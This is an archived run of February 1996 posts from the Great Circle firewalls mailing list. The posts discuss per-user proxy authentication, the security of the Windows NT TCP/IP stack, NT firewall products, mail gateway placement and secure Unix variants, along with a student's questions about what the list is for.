SP, tCED cDm From firewalls-owner Tue Feb 6 15:24:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA09483 for firewalls-outgoing; Tue, 6 Feb 1996 15:21:10 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA09478 for ; Tue, 6 Feb 1996 15:21:06 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id RAA16865 for GreatCircle.COM!firewalls; Tue, 6 Feb 1996 17:12:08 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA15430; 6 Feb 96 17:42:40 CST (Tue) Received: by sonic.nmti.com; id AA21227; Tue, 6 Feb 1996 17:13:22 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602062313.AA21227@sonic.nmti.com.nmti.com> Subject: Re: Survey To: janken@rust.net (Kenneth J. Stephens) Date: Tue, 6 Feb 1996 17:13:22 -0600 (CST) Cc: goertzek@wangfed.com, firewalls@GreatCircle.COM In-Reply-To: <199602061540.KAA18136@Fe3.rust.net> from "Kenneth J. Stephens" at Feb 6, 96 10:40:05 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > If the magazine publishers forced the issue date onto all of their reprints > the vendors would have little use for the reprints. The date stamp would > obsolete > the reprint so quickly that the vendor would look foolish for distributing > old info. In other words the magazine is colluding in a deceptive practice. 
From firewalls-owner Tue Feb 6 15:39:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07934 for firewalls-outgoing; Tue, 6 Feb 1996 14:49:51 -0800 (PST) Received: from ocean.st.usm.edu (ocean.st.usm.edu [131.95.110.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07929 for ; Tue, 6 Feb 1996 14:49:45 -0800 (PST) Received: (from rafuster@localhost) by ocean.st.usm.edu (8.6.12/8.6.9) id QAA13809 for Firewalls@GreatCircle.COM; Tue, 6 Feb 1996 16:50:45 -0600 Message-Id: <199602062250.QAA13809@ocean.st.usm.edu> Subject: This is a test To: Firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 16:50:44 -0600 (CST) From: "Raul Arturo Fuster" X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hello everyone. I'm kinda new at this. This is an > assignment for a class. What exaclly is this about. > I believe it is about internet security. If it is not > let me know. > Later. > -- > Raul A. Fuster > rafuster@ocean.st.usm.edu > rafuster@whale.st.usm.edu > http://ocean.st.usm.edu/~rafuster (under construction) > Tel. 
(601)266-1196 > > "CARPE DIEM" > From firewalls-owner Tue Feb 6 15:53:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08264 for firewalls-outgoing; Tue, 6 Feb 1996 14:57:39 -0800 (PST) Received: from guardian.colonial.com.au (guardian.colonial.com.au [140.168.249.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA08250 for ; Tue, 6 Feb 1996 14:57:31 -0800 (PST) From: pmoen@sbnsw.com.au Received: by guardian.colonial.com.au; id JAA17789; Wed, 7 Feb 1996 09:56:36 +1100 Received: from norman.cmutual.com.au(140.168.8.9) by guardian.colonial.com.au via smap (g3.0.1) id sma017783; Wed, 7 Feb 96 09:56:10 +1100 Received: from redbaron.cmutual.com.au ([140.168.1.5]) by norman.cmutual.com.au (post.office MTA v1.9.1 **** trial license expired ****) with SMTP id AAA29797 for ; Wed, 7 Feb 1996 09:57:33 +1100 Received: from mailgw.sbnsw.com.au by redbaron.cmutual.com.au with SMTP id AA19842 (5.65c/IDA-1.5 for ); Wed, 7 Feb 1996 09:57:27 +1100 Received: by mailgw.sbnsw.com.au; Wed, 7 Feb 96 10:00:58 +1000 Date: Wed, 7 Feb 96 10:00:56 SYD Message-Id: X-Priority: 3 (Normal) To: Subject: Info needed X-Incognito-Sn: 606 X-Incognito-Format: VERSION=2.01a ENCRYPTED=NO Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm after some information on the following products: IBM NetSP Firewall (Secure Network Gateway) Microsoft NT Firewall I'm really after articles etc. that have been archived etc. and discussions from this group so refs to archives would be great if it is possible. 
any other info would also be greatly appreciated thanx in advance later Paul From firewalls-owner Tue Feb 6 16:08:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11819 for firewalls-outgoing; Tue, 6 Feb 1996 16:06:10 -0800 (PST) Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA11789 for ; Tue, 6 Feb 1996 16:05:24 -0800 (PST) Received: from cnw06.UUCP (root@localhost) by yarrina.connect.com.au with UUCP id LAA01840 (8.6.12/IDA-1.6 for firewalls@GreatCircle.COM); Wed, 7 Feb 1996 11:04:14 +1100 Received: from mecx05. colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA15094; Wed, 7 Feb 96 10:56:01 EST Received: from meei91 (meei97) by mecx05. colesmyer.com.au (5.0/SMI-4.1) id AA19830; Wed, 7 Feb 1996 10:41:35 +1100 Message-Id: <3117F7B3.3647@mecx05.colesmyer.com.au> Date: Wed, 07 Feb 1996 10:52:03 +1000 From: Graham Jose Organization: Coles Myer Limited X-Mailer: Mozilla 2.0b6a (WinNT; I) Mime-Version: 1.0 To: "firewalls@GreatCircle.COM" Subject: User level firewall / proxy authentication Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any firewall or proxy server products available that will allow outgoing user authentication based upon a user id, rather than an IP address? Our users are mobile and this makes it difficult to restrict internet access on a per user basis, since their source IP address is likely to change. 
Thanks, Graham -- Graham Jose, Technical Analyst, Information Systems Security Retail Technology Services, Coles Myer Limited (Australia) Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au From firewalls-owner Tue Feb 6 16:57:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA14357 for firewalls-outgoing; Tue, 6 Feb 1996 16:43:57 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA14261 for ; Tue, 6 Feb 1996 16:42:29 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id SAA10173; Tue, 6 Feb 1996 18:41:37 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id SAA04240; Tue, 6 Feb 1996 18:41:36 -0600 Posted-Date: Tue, 6 Feb 1996 18:41:36 -0600 Date: Tue, 6 Feb 1996 18:41:35 -0600 (CST) From: Ron DuFresne To: Graham Jose cc: "firewalls@GreatCircle.COM" Subject: Re: User level firewall / proxy authentication In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Graham Jose wrote: > Are there any firewall or proxy server products available that will allow > outgoing user authentication based upon a user id, rather than an IP address? > > Our users are mobile and this makes it difficult to restrict internet access on a > per user basis, since their source IP address is likely to change. > This sounds pretty unsafe! How do you prevent me from spoofing one of your users? Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." 
-- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Tue Feb 6 17:24:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA15628 for firewalls-outgoing; Tue, 6 Feb 1996 17:07:20 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA15623 for ; Tue, 6 Feb 1996 17:07:14 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA02437; Tue, 6 Feb 96 19:03:59 CST Date: Tue, 6 Feb 96 19:03:59 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602070103.AA02437@garrison.com.> To: firewalls@greatcircle.com Subject: NT's TCP/IP stack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As we have all seen in the last few weeks, there have been several people who have been ragging on the Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. 
Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Tue Feb 6 17:46:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA16866 for firewalls-outgoing; Tue, 6 Feb 1996 17:37:45 -0800 (PST) Received: from ocean.st.usm.edu (ocean.st.usm.edu [131.95.110.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA16861 for ; Tue, 6 Feb 1996 17:37:40 -0800 (PST) Received: (from rafuster@localhost) by ocean.st.usm.edu (8.6.12/8.6.9) id TAA20459 for firewalls@GreatCircle.COM; Tue, 6 Feb 1996 19:38:42 -0600 Message-Id: <199602070138.TAA20459@ocean.st.usm.edu> Subject: hello To: firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 19:38:41 -0600 (CST) From: "Raul Arturo Fuster" X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello everyone. I don't know if you got my last msg. I am doing this as a class assignment and I would like to know a little bit more about this mailing list. I have the notion that this is about Net security. If it is what kind of security is it about. Just let me know a little more. Later. -- Raul A. Fuster rafuster@ocean.st.usm.edu rafuster@whale.st.usm.edu http://ocean.st.usm.edu/~rafuster (under construction) Tel. 
(601)266-1196 "CARPE DIEM" From firewalls-owner Tue Feb 6 19:53:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA21471 for firewalls-outgoing; Tue, 6 Feb 1996 19:51:51 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA21466 for ; Tue, 6 Feb 1996 19:51:47 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id WAA11254; Tue, 6 Feb 1996 22:48:16 -0500 Date: Tue, 6 Feb 1996 22:48:12 -0500 (EST) From: Rabid Wombat To: Raul Arturo Fuster cc: firewalls@greatcircle.com Subject: More Firewalls info (was hello:) In-Reply-To: <199602070138.TAA20459@ocean.st.usm.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This mailing list is primarily devoted to the discussion of firewalls, devices which restrict access between two (or more) networks, (often between a private network and Internet). For more information, see: The archives of this mailing list: http://www.greatcircle.com/firewalls/archive/ The firewalls FAQ @ Ohio State: http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html A good collection of links: http://www.willamette.edu/~dlabar/firewall.html or read Chapman and Zwicky Building Internet Firewalls http://www.greatcircle.com/firewalls-book/ Cheswick and Bellovin Firewalls and Internet Security - Repelling the Wily Hacker http://www.aw.com/cp/Ches.html ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Tue, 6 Feb 1996, Raul Arturo Fuster wrote: > Hello everyone. I don't know if you got my last msg. > I am doing this as a class assignment and I would like > to know a little bit more about this mailing list. > I have the notion that this is about Net security. > If it is what kind of security is it about. 
> Just let me know a little more. > Later. > -- > Raul A. Fuster > rafuster@ocean.st.usm.edu > rafuster@whale.st.usm.edu > http://ocean.st.usm.edu/~rafuster (under construction) > Tel. (601)266-1196 > > "CARPE DIEM" > From firewalls-owner Tue Feb 6 22:08:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA25562 for firewalls-outgoing; Tue, 6 Feb 1996 21:57:26 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA25548 for ; Tue, 6 Feb 1996 21:57:19 -0800 (PST) Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA252; Wed, 7 Feb 1996 00:56:25 -0500 Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca>; Wed, 7 Feb 1996 00:55:01 -0500 Message-ID: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca> From: Russ To: "'Jeromie Jackson'" Cc: "'Firewalls'" Subject: RE: NT's TCP/IP stack Date: Wed, 7 Feb 1996 00:54:59 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should probably be more specific in your request for information. For example, would you like me to list the bugs in the TCP/IP stack for; v3.5 no Service Packs (SP) v3.5 SP1 v3.5 SP2 v3.5 SP3 (C2 compliant without networking) v3.51 no SP v3.51 SP1 v3.51 SP2 v3.51 SP3 v3.51 SP3 with SRV.SYS Hot Fix or v3.51 SP4 (due out in the next 10 days) or v4.0 (due out in the next few months) Considering that these releases were all made in the last 18 months, it's quite conceivable that you could encounter one, or all, of these environments. This, I think, might be the biggest problem here. This list only outlines the Microsoft releases, in addition to these, you have all the releases of driver software from the various NIC vendors to deal with. 
Add Systems Management Server (which has a network monitor component that adds to the stack functionality and exploits embedded RMON in NT Servers it connects to), various server products which add performance meters for various IP related tasks (Web servers that track number of hits on HTTP, for example). Then couple that with numerous registry entries which can be manipulated by the Administrator for various performance gains (or losses, depending on the Admin ;-]). Oh, and by the way, you could be talking about a network interface entity that includes not only IP, but NetBeui, IPX, AppleTalk, DLC (hmmm, I feel like I'm missing a protocol here)... It's extremely difficult to talk about a "generic" IP stack for Windows NT, which may explain the lack of interest or insight into its secure nature. For now, sites pretty well have to be taken on a case by case basis with certain "generic" principles being applied initially, and then some real work and imagination. For these reasons alone, I can see why "secure" types (what name did we end up with again? -- no, please don't remind me) have issues with its widespread use in secure environments. Of course, there is also the issue that whenever MS releases a Service Pack, they give you a nice list of all the bugs they fixed. What they don't tell you is that they don't always list all of the fixed items. They also don't tell you (how could they) all the things they broke while fixing things. The end result is, you would have to go back and apply your tests to see if your security is still intact. [Firewall relevance] To some extent, there may be some relief to all of this on the horizon. With the introduction of Raptor and soon Network-1 into the Windows NT realm of Firewalls, there are seriously security conscious individuals who will have to track these changes to see if they affect their product. Hopefully this will lead to increased scrutiny of the product from a specifically secure standpoint. 
[Shameless plug] Of course, with the just announced strategic partnership between MCI and Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN on the Internet, we will hopefully see lots more NT boxes on the Internet, again, forcing people to look more closely at the viability of securing NT boxes. There's definitely something wrong with someone like me who lives for these types of questions, I guess I just love the controversy! ;-] Cheers, Russ Cooper - Senior Consultant - Internet SHL/Computer Innovations - Consulting Services "Do you have the vision to see my future as I projected it?" From firewalls-owner Wed Feb 7 03:38:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04652 for firewalls-outgoing; Wed, 7 Feb 1996 03:27:54 -0800 (PST) Received: from uu9.psi.com (uu9.psi.com [38.145.107.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04647 for ; Wed, 7 Feb 1996 03:27:50 -0800 (PST) Received: from infosys.inf.COM by uu9.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; id AA06746 for firewalls@greatcircle.com; Wed, 7 Feb 96 06:26:43 -0500 Received: by Inf.COM (4.1/SMI-4.1) id AA24690; Wed, 7 Feb 96 06:24:04 EST Received: from unknown(204.4.59.106) by infosys.inf.COM via smap (V1.3) id sma024622; Wed Feb 7 06:23:30 1996 Received: from cc:Mail by smtp_gw.inf.com id AA823691133; 07 Feb 95 12:20:06 EST Date: 07 Feb 95 12:20:06 EST From: "SATEESHB" Message-Id: <9601078236.AA823691133@smtp_gw.inf.com> To: firewalls@greatcircle.com, jeromie@garrison.com (Jeromie Jackson), winnt-l@eva.dc.lsoft.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, I don't know how relevant the reply is to your needs. I faced problems with NetManage Chameleon version 5.0. It starts a program called NEWT (NetManage Enhanced Windows Tcp/IP). 
When I try to run one of my programs which is a service from service control panel, it hangs.Even that cute messagebox "Attempting to start Service " with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel, NEWT tcp/ip might be conflicting with NT TCP/IP. Why should NetManage guys have a different program for this when NT provides one is beyond my comprehension. It would be of help to me if some one can tell me how is Service Control Manager is related to TCP/IP here?.(Is it something to do with RPC stuff they talk about for starting services remotely?.In my case I started locally). Any discussion on NT TCP/IP stack will be greatly appreciated. Regards, Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India. ______________________________ Reply Separator _________________________________ Subject: NT's TCP/IP stack Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW Date: 2/6/96 7:03 PM As we have all seen in the last few weeks, there have been several people who have been ragging on Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find. NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.. I would be very interested in hearing about these issues. 
Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Wed Feb 7 06:09:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA08886 for firewalls-outgoing; Wed, 7 Feb 1996 06:07:08 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA08881 for ; Wed, 7 Feb 1996 06:07:04 -0800 (PST) Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id KAA02865 for ; Wed, 7 Feb 1996 10:39:03 -0500 Message-ID: <3118B1D7.7C54@fc.com> Date: Wed, 07 Feb 1996 09:06:15 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: NT Firewalls/Web Servers Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know of any good NT Firewalls and Web Servers? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. 
One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Wed Feb 7 06:54:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA09757 for firewalls-outgoing; Wed, 7 Feb 1996 06:44:53 -0800 (PST) Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA09744 for ; Wed, 7 Feb 1996 06:44:48 -0800 (PST) Received: by protosoft.com (4.1/SMI-4.1) id AA14974; Wed, 7 Feb 96 08:42:45 CST Date: Wed, 7 Feb 1996 08:42:45 -0600 (CST) From: Mohammed Ali To: Matts Kallioniemi Cc: Sick Puppy , firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: <199602061550.QAA17949@mail.pi.se> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Matts Kallioniemi wrote: > At 17.41 1996-02-05 -0500, Sick Puppy wrote: > >There was a very good response to my query. I had no idea there were > >so many security problems and performance problems associated with > >WindBlows 95. Sounds like the operating system was written by a couple > >of drunken cats. In a couple of days I will get the responses together > >in one file, together with a couple of good web pointers, and pass it on > >to anyone who wants an e-mailed copy. > > I want one, please! Why don't you post it to the list? I also want a copy, please mail it to the list. Mohammed Ali. 
From firewalls-owner Wed Feb 7 07:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10595 for firewalls-outgoing; Wed, 7 Feb 1996 07:12:01 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA10590 for ; Wed, 7 Feb 1996 07:11:56 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id JAA23576 for ; Wed, 7 Feb 1996 09:11:22 -0600 (CST) Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.7.2/8.7.2) with SMTP id JAA23572 for ; Wed, 7 Feb 1996 09:11:21 -0600 (CST) Received: from zuhn.sctc.com (zuhn.sctc.com [172.17.1.134]) by spirit.sctc.com (8.6.12/8.6.9) with SMTP id JAA10390; Wed, 7 Feb 1996 09:11:52 -0600 Message-Id: <199602071511.JAA10390@spirit.sctc.com> Date: Wed, 07 Feb 1996 09:11:48 -0600 From: zuhn@sctc.com (david d `zoo' zuhn) To: firewalls@greatcircle.com Subject: Re: User level firewall / proxy authentication References: <3117F7B3.3647@mecx05.colesmyer.com.au> Organization: Secure Computing Corporation; Roseville, MN Sender: firewalls-owner@GreatCircle.COM Precedence: bulk // > Are there any firewall or proxy server products available that will allow // > outgoing user authentication based upon a user id, rather than an IP // > address? // > // > Our users are mobile and this makes it difficult to restrict internet // > access on a per user basis, since their source IP address is likely to // > change. // // This sounds pretty unsafe! How do you prevent me from spoofing one of // your users? Yes, there are several firewall systems that handle authentication on a per-user basis. All that I know of will also allow permission acl's that include host address ranges as well. 
This can be useful when dealing with a range of dynamic addresses (such as allocated by DHCP or similar protocols), requiring userid based authentication for those addresses, and relying on host-based permissions for the static addresses on the network. As for the safety, there are usually a variety of means available for user authentication. Those I have seen in the market range from insecure username & reusable passwords (a la Unix passwords) to software based challenge-response systems (LOCKout or S/Key) to hardware based token cards of some form or another (SecurID, SNK). A common tradeoff in authentication systems is price vs. unspoofability. For many sites, outbound authentication is used more for accounting chargeback schemes than for any more stringent authorization, so a reusable password system isn't unreasonable. But I'd never trust inbound authentication to anything that doesn't use some form of cryptographically secure algorithm. -- david d `zoo' zuhn --- secure computing corporation zuhn@sctc.com From firewalls-owner Wed Feb 7 07:53:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10951 for firewalls-outgoing; Wed, 7 Feb 1996 07:27:19 -0800 (PST) Received: from gatekeeper.vitro.com (gatekeeper.vitro.com [149.32.254.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA10944 for ; Wed, 7 Feb 1996 07:27:10 -0800 (PST) From: don_tompkins@esd.tracor.com Received: by gatekeeper.vitro.com (5.65/DEC-Ultrix/4.3) id AA12018; Wed, 7 Feb 1996 10:25:45 -0500 Received: from esd.vitro.com(131.189.79.30) by gatekeeper.vitro.com via smap (V1.3) id sma012004; Wed Feb 7 10:25:37 1996 Received: from ccMail by esd.tracor.com (IMA Internet Exchange 1.04b) id 118c4360; Wed, 7 Feb 96 10:24:38 -0500 Mime-Version: 1.0 Date: Wed, 7 Feb 1996 08:38:44 -0500 Message-Id: <118c4360@esd.tracor.com> Subject: Most Secure Unix? 
To: giff@congress.east.sun.com (Wayne Gifford - Internet Commerce Group), Firewalls@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What about HP-UX BLS. Other B level efforts are also underway... Concur administration is important. From firewalls-owner Wed Feb 7 08:09:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA11413 for firewalls-outgoing; Wed, 7 Feb 1996 07:46:47 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA11407 for ; Wed, 7 Feb 1996 07:46:39 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 10:46:18 -0500 Message-ID: <80C818310136C8D1@usia.gov> Date: Wed, 7 Feb 96 10:42:40 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: firewalls, email, and dns X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, our smtp mail server is an smtp/mhs gateway that runs on DOS. since it does not have the traditional sendmail vulnerabilities can I/should I allow smtp traffic through a firewall to it rather than having a mail forwarder outside the firewall receive the mail and send it to the gateway? yes/no? and if yes, are there any other considerations, for example, how should i set up the internal and external dns's? cc to my email would be great. thanks. Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." 
+ +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 08:40:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12742 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:11 -0800 (PST) Received: from netsurfer.pixi.com (netsurfer.pixi.com [140.174.243.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12737 for ; Wed, 7 Feb 1996 08:18:06 -0800 (PST) Received: from netsurfer by netsurfer.pixi.com ; 7 FEB 96 06:12:59 Date: Wed, 7 Feb 1996 06:12:58 -1000 (HST) From: NetSurfer X-Sender: netsurf@netsurfer To: SATEESHB Cc: firewalls@greatcircle.com, Jeromie Jackson , winnt-l@eva.dc.lsoft.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. In-Reply-To: <9601078236.AA823691133@smtp_gw.inf.com> Message-ID: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are you running the Windows Chameleon or the NT Chameleon? On -1 xxx -1, SATEESHB wrote: > I faced problems with NetManage Chameleon version 5.0 .It starts a > program called NEWT(NetManage Enhanced Windows Tcp/IP). 
8< snip 8< snip #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From firewalls-owner Wed Feb 7 08:53:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12226 for firewalls-outgoing; Wed, 7 Feb 1996 08:07:19 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12221 for ; Wed, 7 Feb 1996 08:07:13 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA19254; Wed, 7 Feb 96 11:09:47 EST Date: Wed, 7 Feb 1996 11:09:46 -0500 (EST) From: Scott Barman To: Wayne Gifford - Internet Commerce Group Cc: Firewalls@GreatCircle.COM Subject: Re: Most Secure Unix? In-Reply-To: <199601292147.QAA06214@traveller.East.Sun.COM> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 29 Jan 1996, Wayne Gifford - Internet Commerce Group wrote: > > There are no secure UNIXes, only security concious administrators Geez... we're back on this again? How about: There are no secure OPERATING SYSTEMS, only security conscience administrators/sysops/people who give a darn. Is that OK and politically correct? I sure hope so! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." 
